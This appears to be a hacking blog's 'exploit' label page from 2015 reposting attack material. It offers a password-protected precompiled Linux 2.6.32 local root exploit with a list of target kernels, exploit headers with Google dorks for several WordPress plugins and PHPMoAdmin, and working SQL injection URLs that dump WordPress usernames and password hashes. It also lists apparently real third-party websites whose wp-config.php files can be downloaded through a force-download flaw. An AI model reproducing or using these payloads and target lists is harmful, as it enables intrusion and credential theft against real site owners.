Showing posts with label exploit. Show all posts
Showing posts with label exploit. Show all posts
Thursday, August 20, 2015
Wednesday, April 15, 2015
Tuesday, March 31, 2015
Local Root Exploit For Linux Kernel 2.6.32 (precompile)
Note:
Its a pre-compiled exploit and has been verified for list servers. It might working on other 2.6.32-X kernels too. So, test it and update us in comments. Thanks.
Following is the list of vulnerable kernels which can be rooted with our exploit.
Vulnerable Kernels:
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64
Linux localhost.domain 2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64
Linux localhost.domain 2.6.32-279.19.1.el6.x86_64 #1 SMP Wed Dec 19 07:05:20 UTC 2012 x86_64
Linux localhost.domain 2.6.32-279.22.1.el6.x86_64 #1 SMP Wed Feb 6 03:10:46 UTC 2013 x86_64
Linux localhost.domain 3.2.2-ipprojects #4 SMP Fri Feb 3 15:53:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab076.5 #1 SMP Mon Mar 18 20:41:34 MSK 2013 x86_64
Linux localhost.domain 2.6.32-220.4.1.el6.x86_64 #1 SMP Tue Jan 24 02:13:44 GMT 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el6.x86_64 #1 SMP Wed Apr 3 12:05:42 EEST 2013 x86_64
Linux localhost.domain 2.6.32-042stab068.8 #1 SMP Fri Dec 7 17:06:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.14.el6.x86_64 #1 SMP Wed Mar 6 15:12:30 EET 2013 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.6.el6.x86_64 #1 SMP Fri Jan 18 10:16:30 EST 2013 x86_64
Linux localhost.domain 2.6.32-042stab053.5 #1 SMP Tue Mar 27 11:42:17 MSD 2012 x86_64
Linux localhost.domain 2.6.32-279.el6.x86_64 #1 SMP Fri Jun 22 12:19:21 UTC 2012 x86_64
Linux localhost.domain 3.2.0-0.bpo.3-amd64 #1 SMP Thu Aug 23 07:41:30 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.0.1.el6.x86_64 #1 SMP Wed Feb 27 06:06:45 UTC 2013 x86_64
Linux localhost.domain 2.6.32-042stab061.2 #1 SMP Fri Aug 24 09:07:21 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.14.1.lve1.1.9.9.el6.x86_64 #1 SMP Thu Dec 6 07:12:24 EST 2012 x86_64
Linux localhost.domain 2.6.32-12-pve #1 SMP Tue May 15 06:02:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64
Linux localhost.domain 3.2.7 #1 SMP Sun Feb 26 23:00:18 CET 2012 x86_64
Linux localhost.domain 2.6.32-279.14.1.el6.x86_64 #1 SMP Tue Nov 6 23:43:09 UTC 2012 x86_64
Linux localhost.domain 2.6.32-379.22.1.lve1.2.17.el5h.x86_64 #1 SMP Wed Apr 3 14:28:52 EEST 2013 x86_64
Linux localhost.domain 2.6.32-320.4.1.lve1.1.4.el6.x86_64 #1 SMP Wed Mar 7 06:32:27 EST 2012 x86_64
Linux localhost.domain 2.6.32-220.7.1.el6.x86_64 #1 SMP Wed Mar 7 00:52:02 GMT 2012 x86_64
Linux localhost.domain 2.6.32-7-pve #1 SMP Mon Feb 13 07:33:21 CET 2012 x86_64
Linux localhost.domain 2.6.32-042stab062.2 #1 SMP Wed Oct 10 18:28:35 MSK 2012 x86_64
Linux localhost.domain 2.6.38 #5 SMP Sat Mar 19 13:19:08 CET 2011 x86_64
Linux localhost.domain 2.6.32 #1 SMP Wed Sep 5 22:46:20 MSK 2012 x86_64
Linux localhost.domain 2.6.32-379.19.1.lve1.2.7.el6.x86_64 #1 SMP Wed Jan 23 14:53:41 EST 2013 x86_64
Linux localhost.domain 3.2.0-0.bpo.2.dar-amd64 #1 SMP Fri Apr 27 18:23:24 MSK 2012 x86_64
Linux localhost.domain 2.6.32-16-pve #1 SMP Fri Nov 9 11:42:51 CET 2012 x86_64
Linux localhost.domain 2.6.32-220.17.1.el6.x86_64 #1 SMP Wed May 16 00:01:37 BST 2012 x86_64
Linux localhost.domain 2.6.32-279.9.1.el6.x86_64 #1 SMP Tue Sep 25 21:43:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-042stab065.3 #1 SMP Mon Nov 12 21:59:14 MSK 2012 x86_64
Linux localhost.domain 2.6.32-279.5.2.el6.x86_64 #1 SMP Fri Aug 24 01:07:11 UTC 2012 x86_64
Linux localhost.domain 2.6.32-11-pve #1 SMP Wed Apr 11 07:17:05 CEST 2012 x86_64
Linux localhost.domain 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64
Linux localhost.domain 2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64
Linux localhost.domain 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64
Linux localhost.domain 3.5.2 #1 SMP Thu Aug 23 17:07:20 CEST 2012 x86_64
Linux localhost.domain 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64
Linux localhost.domain 2.6.32-279.2.1.el6.x86_64 #1 SMP Fri Jul 20 01:55:29 UTC 2012 x86_64
Linux localhost.domain 3.2.20 #1 SMP Tue Aug 28 02:39:06 MSK 2012 x86_64
Linux localhost.domain 2.6.32-220.4.2.el6.x86_64 #1 SMP Tue Feb 14 04:00:16 GMT 2012 x86_64
Linux localhost.domain 2.6.32-279.5.1.el6.x86_64 #1 SMP Tue Aug 14 23:54:45 UTC 2012 x86_64
Linux localhost.domain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 x86_64 GNU/Linux
Download here
Zip Password: *pakmadhunters*
credit to owner :)
Wednesday, March 18, 2015
Wordpress Plugin Reflex Gallery - Arbitrary File Upload
Via->intelliegentexploit
Thursday, March 5, 2015
wordpress theme photocrati 4.X.X SQL INJECTION
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ] # Google Dork: [ Designed by Photocrati ] also [powered by Photocrati] # Date: [23 / 09 / 2011 ] # Exploit Author: [ ayastar ] # Email : dmx-ayastar@hotmail.fr # Software Link: [ http://www.photocrati.com ] # Version: [4.X.X] # Tested on: [ windows 7 ]
details | ======================================================= Software : photocrati version : 4.X.X Risk : High remote : yes attacker can do a remote injection in site URL to get some sensitive information . =======================================================
PHPMoAdmin Remote Code Execution
###################################################################### # _ ___ _ _ ____ ____ _ _____ # | | / _ \| \ | |/ ___|/ ___| / \|_ _| # | | | | | | \| | | _| | / _ \ | | # | |__| |_| | |\ | |_| | |___ / ___ \| | # |_____\___/|_| \_|\____|\____/_/ \_\_| # # PHPMoAdmin Unauthorized Remote Code Execution (0-Day) # Website : http://www.phpmoadmin.com/ # Exploit Author : @u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio # Release dates : March 3, 2015 # # Special Thanks to 2600 Thailand group # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/ # ######################################################################## [+] Description ============================================================ PHPMoAdmin is a MongoDB administration tool for PHP built on a stripped-down version of the Vork high-performance framework.
WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection] # Date: 2015-02-12 # Exploit Author: Mateusz Lach # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip # Version: 1.4.9 # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application. # CVE : CWE-89 # OWASP Top10: A1-Injection
Google Dork-> /wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=
define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=
1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME
(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name
%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,
%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');
define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=
2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR
(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR
(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup
%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');
Friday, February 27, 2015
Wordpress force download Local File Download
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Exploit Title: Wordpress force download Local File Download [+] [+] Exploit Author: Ashiyane Digital Security Team , Milad Hacking [+] [+] Date: 2015-02-22 [+] [+] Google Dork 1 : inurl:wp-content inurl:force-download.php?file= [+] [+] Vendor Homepage : http://elouai.com/force-download.php [+] [+] Tested on: Kali , Mozilla FireFox [+] [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Location : [localhost]/patch/force-download.php?file=[LFD] [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Demo : [+] [+] http://llyndamoreboots.com/wp/wp-content/force-download.php?file=../wp-config.php [+] [+] [+] http://www.bricomarchesollies.com/force-download.php?file=wp-config.php [+] [+] http://www.globalvoip.ca/force-download.php?file=wp-config.php [+] [+] http://www.hairline.it/force-download.php?file=wp-config.php [+] [+] http://vismatica.com/force-download.php?file=wp-config.php [+] [+] http://daileyortho.com/wp-content/uploads/patientforms/force-download.php?file=../../../wp-config.php [+] [+] [+] http://www.cfpsych.org/wp-content/force-download.php?file=../wp-config.php [+] [+] http://www.islanegrawines.com/force-download.php?file=wp2/wp-config.php [+] [+] http://vismatica.com/force-download.php?file=/home/vismatic/public_html/wp-config.php [+] [+] http://www.kanazawa-adc.com/force-download.php?file=wp-config.php [+] [+] www.ciudadanosindependientes.es/wp-content/themes/ucin/includes/force-download.php?download=1&file=/homepages/40/d544309672/htdocs/wp-config.php [+] [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] Discovered By : Milad Hacking , Iliya Norton [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] Spcial Tnx To Admin , packetstormsecurity.com [+] [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Via-> intelligentexploit.com
Subscribe to:
Posts (Atom)
